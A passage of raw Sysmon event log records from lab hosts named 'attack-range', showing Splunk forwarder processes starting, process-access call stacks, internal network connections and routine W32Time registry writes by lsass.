Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297950Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:20.730{C8EA50B7-1838-6216-4307-000000003802}6672C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000297949Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:20.295{C8EA50B7-1838-6216-4207-000000003802}1000840C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297948Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:20.030{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1838-6216-4207-000000003802}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297947Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:20.030{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297946Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:20.030{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297945Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:20.030{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297944Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:20.030{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297943Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:20.030{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1838-6216-4207-000000003802}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297942Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:20.030{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1838-6216-4207-000000003802}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297941Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:20.031{C8EA50B7-1838-6216-4207-000000003802}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297969Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:21.964{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30B9D673DB876AE20875E239AD4ED7D0,SHA256=18ECD83E37C87E6ECBC2B13F1F4782FC118096EE1CA005EED23EE83819379F53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221819Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:21.008{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=846E2BB9765914F82E8A8A67BBA694F6,SHA256=07D0F635206B851BE3458A5C1912F686809254D5128325C0D6798B1F6808DFF0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297968Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:19.686{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49496-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000297967Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:21.413{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1839-6216-4407-000000003802}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297966Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:21.413{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297965Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:21.413{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297964Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:21.413{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297963Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:21.413{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297962Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:21.413{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1839-6216-4407-000000003802}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297961Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:21.413{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1839-6216-4407-000000003802}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297960Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:21.414{C8EA50B7-1839-6216-4407-000000003802}4280C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297970Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:22.964{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6B9113D0062735058EE83DE1349FC62,SHA256=4E6C36639D21502F863A70F09B1C3CCF016B0C7776EBD805FEEACE3876822EA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221820Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:22.243{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAD82EE47BA758A6FC16422C76F99427,SHA256=11DBB0D3AB15377F4087947621CE3B5948C8B6E794D2B72256B7B7CE4DB89070,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297971Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:23.998{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=389FC34A511455A162ECC460A45D337C,SHA256=BA5681FDCE9ACDEE18C97FCAE908E0020DB65942F88EA82CCFC5D65C9C026C40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221821Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:23.399{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=541B7EB6CF46BCD1492A5E380EAF8B32,SHA256=0AA0F5C602EBCCBC2517A2667C8232F401C2DC1E35F71706E17CD8AC5F53D8D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221823Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:24.414{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E5C354F6A2A941BBCA673409181EE9C,SHA256=8DA893EE1D62137050A8D18FB027F8D280806F96D5EFA1D9D5711AC431E97CB1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221822Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:21.508{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51677-false10.0.1.12-8000- 23542300x8000000000000000221824Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:25.649{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CF07077395F215FB30ACFE62DD53035,SHA256=64870C0BECE7EB779F235940BE3CAF950A627A6634CD864690CB30A8C9B86646,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297972Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:25.032{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7718A14B06E8C8ED1CF1434369F4B579,SHA256=85B8B3C6874BB8AB58FAD0A7FB4EB165E6E8DD2FB7D39A914AAD8E2E23A2ED8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221825Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:26.680{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79F77FD1F3DE94204F52FD231EB1700D,SHA256=799B5C171858819AC8A663BFD5B1E6C2B5EC13C1DA4558DB28A896ED9EE1A873,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297984Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:26.961{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000297983Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:19:26.746{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000297982Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:19:26.746{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0098f411) 13241300x8000000000000000297981Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:19:26.746{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8289e-0xd5c81fd9) 13241300x8000000000000000297980Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:19:26.746{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a7-0x378c87d9) 13241300x8000000000000000297979Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:19:26.746{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828af-0x9950efd9) 13241300x8000000000000000297978Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:19:26.746{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000297977Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 11:19:26.746{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0098f411) 13241300x8000000000000000297976Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 